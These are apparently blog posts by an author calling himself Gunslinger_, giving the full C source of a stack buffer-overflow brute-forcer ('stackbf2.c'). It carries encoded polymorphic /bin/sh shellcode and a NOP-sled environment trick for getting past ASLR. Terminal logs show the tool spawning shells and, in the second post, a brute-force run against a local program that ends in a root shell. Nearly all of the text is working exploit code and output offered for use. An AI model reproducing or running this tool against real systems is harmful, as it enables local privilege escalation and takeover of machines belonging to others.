break a time, with break the c0de…

Posts tagged “exploitation

stackbf2.c


This is newer version of stackbf

i use

static inline getesp()
{
      __asm__("movl %esp,%eax"); /* will get return address in %eax, no more debugging for that ;) */
}

For return address, because that is has a good accuracy so i use that .

/*
*	stack brute forcer by Gunslinger_ yudha.gunslinger@gmail.com
*	This is version 2 of stackbf.c
*	The difference is we doesn't use our own return address , because some asm that copied %esp register into %eax register
*	This return value can be use with good accuracy, so we use for that .  
*
*	# original assembly of shellcode, but there is has been encoded to polymorphic shellcode for hidding some character like "\xcd\x80" or "int $0x80" in assembly 
*	.global _start
*	_start:
*
*	xor	%eax, %eax
*	xor	%ebx, %ebx
*	xor	%ecx, %ecx
*	xor	%edx, %edx
*
*	mov	$0xb, %al
*	push	%ebx
*	push	$0x68732f2f
*	push	$0x6e69622f
*	mov	%esp, %ebx
*	xor	%edx, %edx
*	xor	%edx, %edx
*	push	%ebx
*	int	$0x80
*
*	inc	%eax
*	int	$0x80
*
*	
*/


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define NOP 0x90	

/* Length of environment variable ~ 128 Kb */
#define ENV_LEN 128000

static inline getesp()
{
      __asm__("movl %esp,%eax"); /* will get return address in %eax, no more debugging for that ;) */
}


char shellcode[] = "\xeb\x11\x5e\x31\xc9\xb1\x21\x80\x6c\x0e\xff\x35\x80\xe9\x01" /* Polymorphic shell */
		   "\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x66\xf5\x66\x10\x66\xfe"
		   "\x66\x07\xe5\x40\x88\x9d\x64\x64\xa8\x9d\x9d\x64\x97\x9e\xa3"
		   "\xbe\x18\x66\x07\x66\xfe\x88\x02\xb5\x75\x02\xb5";
		   
int main(int argc, char **argv)
{
	char *application = NULL;
	char *buffer = NULL;
	char env_var[ENV_LEN];
	char *env[2] = { env_var, NULL};
	int *p, num, ret, pid, payload_size;

	if (argc < 3)
	{
		printf("\nStack Brute Force");
		printf("\nProgrammer : Gunslinger_");
		printf("\nUsage: %s <application> <payload_size>\n\n", argv[0]);
		exit(1);
	}
	
	printf("[*] Using return address 0x%x \n", getesp());
	printf("[*] Environment variable %d kb\n", ENV_LEN / 1000);
	printf("[*] Shellcode size %d bytes\n", strlen(shellcode));
	
	application = strdup(argv[1]);
	payload_size = atoi(argv[2]);
	buffer = (char*) malloc(payload_size);

	memset (env_var, NOP, ENV_LEN);

	memcpy (env_var+ENV_LEN-strlen(shellcode)-1, shellcode, strlen(shellcode));
	env_var[ENV_LEN-1]=0;

	p = (int*) buffer;

	for (num = 0; num < payload_size; num += sizeof(int), p++)
		*p = getesp();
	*p=0;
	do {
		switch(pid=fork())
		{
		case 0:
			execle (application, application, buffer, NULL, env);
			exit(0);
			break;
		default:
			waitpid (pid, &ret, 0);
			break;
		}
	}
while (ret);
}

and this is the program in action

gunslinger@codebreaker:~/bof$ cat /proc/sys/kernel/randomize_va_space
2
gunslinger@codebreaker:~/bof$ ./stackbf2 bof 408 
[*] Using return address 0xbf941d04 
[*] Environment variable 128 kb
[*] Shellcode size 57 bytes
# exit
gunslinger@codebreaker:~/bof$ ./stackbf2 bof 408 
[*] Using return address 0xbfeb4a74 
[*] Environment variable 128 kb
[*] Shellcode size 57 bytes
# exit
gunslinger@codebreaker:~/bof$ ./stackbf2 bof 408 
[*] Using return address 0xbfdabfc4 
[*] Environment variable 128 kb
[*] Shellcode size 57 bytes
# exit
gunslinger@codebreaker:~/bof$ ./stackbf2 bof 408 
[*] Using return address 0xbfbdc7a4 
[*] Environment variable 128 kb
[*] Shellcode size 57 bytes
# exit
gunslinger@codebreaker:~/bof$

easy buffer overflow exploitation


This is buffer overflow scenario with ASLR (Address Space Layer Randomization) and using some my tools that’s made so easy…

gunslinger@c0debreaker:~/bof$ cat /proc/sys/kernel/randomize_va_space
2
gunslinger@c0debreaker:~/bof$ ./ron a
The message was: a
Program completed normally!

gunslinger@c0debreaker:~/bof$ ./ron aaa
The message was: aaa
Program completed normally!
gunslinger@c0debreaker:~/bof$ ./bufferbruteforce.py -a /home/gunslinger/bof/ron -s 1 -e 500

Buffer brute force
Programmer : gunslinger_ <yudha.gunslinger@gmail.com>

[*] Checking Existing application 					[Ok]
[*] Checking perl 							[Ok]
[*] Preparing for bruteforcing buffer 					[Ok]
[*] buffering on 44 byte(s)
[!] Application got segmentation fault by giving 44 byte(s) into buffer !!

gunslinger@c0debreaker:~/bof$ ./stackbf ron 48
[*] Using return address 0xbfd24880
[*] Environment variable 128 kb
[*] Shellcode size 28 bytes
The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

# id
uid=0(root) gid=1000(gunslinger) groups=4(adm),20(dialout),24(cdrom),46(plugdev),106(lpadmin),121(admin),122(sambashare),1000(gunslinger)
# whoami
root
# uname -a
Linux c0debreaker 2.6.28-11-generic #42-Ubuntu SMP Fri Apr 17 01:57:59 UTC 2009 i686 GNU/Linux
# exit
gunslinger@c0debreaker:~/bof$